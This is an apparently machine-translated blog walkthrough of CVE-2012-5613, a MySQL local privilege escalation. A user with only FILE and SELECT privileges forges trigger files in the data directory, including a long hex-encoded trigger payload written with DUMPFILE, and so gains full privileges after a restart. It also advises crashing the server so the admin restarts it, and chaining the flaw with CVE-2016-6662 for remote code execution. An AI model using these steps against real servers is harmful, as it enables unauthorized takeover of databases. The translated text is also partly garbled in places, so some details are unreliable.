cve-2012-5613 MySQL local right to raise

cve-2012-5613 is a vulnerability where file permissions write trigger TRG store files (that is, forged trigger), which are triggered by root to elevate privilege. Do not know why this loophole has not been repaired, probably MySQL think this is a feature bar.

Get ready

Test environment:

Server Version:5.5.48-log Source Distribution

Create a trigger in the test database:

CREATE TABLE foo (a int, b int, ts TIMESTAMP);

CREATE TABLE bar (a int, b int);

INSERT into Foo (A, b) VALUES (n);

INSERT into Foo (A, b) VALUES (2,2);

INSERT into Foo (A, b) VALUES (3,3);

DELIMITER//

CREATE TRIGGER ins_sum after UPDATE on foo

For each ROW

BEGIN

IF new.ts <> Old.ts Then

INSERT into Bar (A, b) VALUES (NEW.A, new.b);

END IF;

END;

///

DELIMITER;

After the creation of the trigger completes, it is found that Foo is generated in the MySQL directory (/usr/local/mysql/var/test/). TRG and Ins_sum. TRN file, owner for MySQL

Change to a simpler trigger:

DROP TRIGGER IF EXISTS ins_sum;

DELIMITER//

CREATE TRIGGER ins_sum after UPDATE on foo

For each ROW

BEGIN

Update user set sex =3 where id = 1;

END;

///

DELIMITER;

TRG file contents at this time:

Type=triggers

\ n END ' update user set sex =3 where id = 1; After UPDATE on Foo

Sql_modes=0

definers= ' [Email protected]% '

client_cs_names= ' UTF8MB4 '

connection_cl_names= ' Utf8mb4_general_ci '

db_cl_names= ' Utf8mb4_general_ci '

To start the test:

Create a normal user with only the file permission +test SELECT permission

CREATE USER ' sec_usr123 ' @ '% ' identified by ' sec_usr123 ';

GRANT FILE on *. * to ' sec_usr123 ' @ '% ';

GRANT SELECT on ' test '. * to ' sec_usr123 ' @ '% ';

Flush Privileges

Under Root, create a trigger that attempts to trigger a normal user to super users directly through a trigger failure:

DROP TRIGGER IF EXISTS ins_sum;

DELIMITER//

CREATE TRIGGER ins_sum after UPDATE on foo

For each ROW

BEGIN

Grant all privileges on * * to [email protected] '% ' with GRANT option;

END;

///

DELIMITER;

To change the wording (https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/23077.pl):

DROP TRIGGER IF EXISTS ins_sum;

DELIMITER//

CREATE TRIGGER ins_sum after UPDATE on foo

For each ROW

BEGIN

UPDATE mysql.user SET select_priv= ' y ', insert_priv= ' y ', update_priv= ' y ', delete_priv= ' y ', create_priv= ' y ', DROP_PR iv= ' y ', reload_priv= ' y ', shutdown_priv= ' y ', process_priv= ' y ', file_priv= ' y ', grant_priv= ' y ', references_priv= ' y ', I ndex_priv= ' y ', alter_priv= ' y ', show_db_priv= ' y ', super_priv= ' y ', create_tmp_table_priv= ' y ', lock_tables_priv= ' y ', Ex ecute_priv= ' y ', repl_slave_priv= ' y ', repl_client_priv= ' y ', create_view_priv= ' y ', show_view_priv= ' y ', Create_routine _priv= ' y ', alter_routine_priv= ' y ', create_user_priv= ' y ', ssl_type= ' y ', ssl_cipher= ' y ', x509_issuer= ' y ', x509_subject = ' y ', max_questions= ' y ', max_updates= ' y ', max_connections= ' y ' WHERE user= ' Sec_usr1234foo ';

END;

///

DELIMITER;

Success.

Try to write to the trigger directory using FIE permissions:

SELECT ' 1111 ' into OUTFILE '/usr/local/mysql/var/test/1.txt '

The write succeeded.

How to write a file by outfile (this way the file already exists)

Normal user sec_usr now uses file permissions to create the TRG file:

SELECT ' type=triggers\ntriggers=\ ' CREATE definer=\ ' root\ ' @\ '%\ ' TRIGGER ins_sum after UPDATE on foo\n\\n for each ROW \n\\n begin\n\\n\n\\n Update user set sex =3 where ID =1; \n\\n\n\\n end\ ' \nsql_modes=0\ndefiners=\ ' [EMA Il protected]%\ ' \nclient_cs_names=\ ' utf8mb4\ ' \nconnection_cl_names=\ ' utf8mb4_general_ci\ ' \ndb_cl_names=\ ' Utf8mb4_general_ci\ "

Into OUTFILE '/usr/local/mysql/var/test/foo. TRG ' fields escaped by ';

SELECT ' Type=triggername\ntrigger_table=foo ' into OUTFILE '/usr/local/mysql/var/test/ins_sum. TRN ' fields escaped by ';

Restart MySQL

sudo/etc/init.d/mysql restart

Multiple attempts to find a backslash brought in,MySQL restart load failed.

for 16 binary writes, note that you want to use dumpfile instead of outfile:

 select 545950453d54524947474552530a74726967676572733d2743524541544520444546494e45523d60726f6f746040602560205452494747455220696e7 35f73756d20414654455220555044415445204f4e20666f6f0d5c6e20202020464f52204541434820524f570d5c6e20202020424547494e0d5c6e2020 20202020202055504441544520206d7973716c2e757365722020534554202053656c6563745f707269763d5c27595c272c2020496e736572745f70726 9763d5c27595c272c20205570646174655f707269763d5c27595c272c202044656c6574655f707269763d5c27595c272c20204372656174655f707269 763d5c27595c272c202044726f705f707269763d5c27595c272c202052656c6f61645f707269763d5c27595c272c202053687574646f776e5f7072697 63d5c27595c272c202050726f636573735f707269763d5c27595c272c202046696c655f707269763d5c27595c272c20204772616e745f707269763d5c 27595c272c20205265666572656e6365735f707269763d5c27595c272c2020496e6465785f707269763d5c27595c272c2020416c7465725f707269763 D5c27595c272c202053686f775f64625f707269763d5c27595c272c202053757065725f707269763d5c27595c272c20204372656174655f746d705f74 61626c655f707269763D5c27595c272c20204c6f636b5f7461626c65735f707269763d5c27595c272c2020457865637574655f707269763d5c27595c272c20205265706c5f73 6c6176655f707269763d5c27595c272c20205265706c5f636c69656e745f707269763d5c27595c272c20204372656174655f766965775f707269763d5 c27595c272c202053686f775f766965775f707269763d5c27595c272c20204372656174655f726f7574696e655f707269763d5c27595c272c2020416c 7465725f726f7574696e655f707269763d5c27595c272c20204372656174655f757365725f707269763d5c27595c272c202073736c5f747970653d5c2 7595c272c202073736c5f6369706865723d5c27595c272c2020783530395f6973737565723d5c27595c272c2020783530395f7375626a6563743d5c27 595c272c6d61785f7175657374696f6e733d5c27595c272c20206d61785f757064617465733d5c27595c272c20206d61785f636f6e6e656374696f6e7 33d5c27595c27202057484552452020557365723d5c277365635f75737231323334666f6f5c273b200d5c6e20202020454e44270a73716c5f6d6f6465 733d300a646566696e6572733d27726f6f744025270a636c69656e745f63735f6e616d65733d27757466386d6234270a636f6e6e656374696f6e5f636 c5f6e616d65733d27757466386d62345f67656e6572616c5f6369270a64625f636c5f6e616d65733d27757466386d62345f67656e6572616c5f6369270a into DumpFile '/usr/ Local/mysql/var/test/foo. TRG ';

SELECT 0x545950453d545249474745524e414d450a747269676765725f7461626c653d666f6f0a into DumpFile '/usr/local/mysql/ Var/test/ins_sum. TRN ';

To restart MySQL, theroot user performs an update to trigger:

SELECT * from mysql.user where user = ' Sec_usr1234foo ';

Update foo set a=9 where b=1;

SELECT * from mysql.user where user = ' Sec_usr1234foo ';

Summarize cve-2012-5613:

Conditions of Use:

1. Normal user +file permission +select permissions

2. The administrator needs to restart MySQL once, triggering a trigger (INSERT, UPDATE, or DELETE).

Attack Mode:

It is best to have a remote environment with the same environment, pre-generated TRG and trn file 16 binary, and then through the dumpfile to the target of the MySQL directory inside. To allow administrators to deny services through MySQL, MySQL downtime management will naturally restart. How to let the administrator trigger, then improvise.

At this point Sec_usr1234foo gets the super user permission, which can be executed set global general_log in conjunction with the previous article cve-2016-6662 (http://www.cnblogs.com/xiaoxiaoleo/p/ 5873091.html), to achieve the so-called ordinary user remote Rce effect.

cve-2012-5613 MySQL local right to raise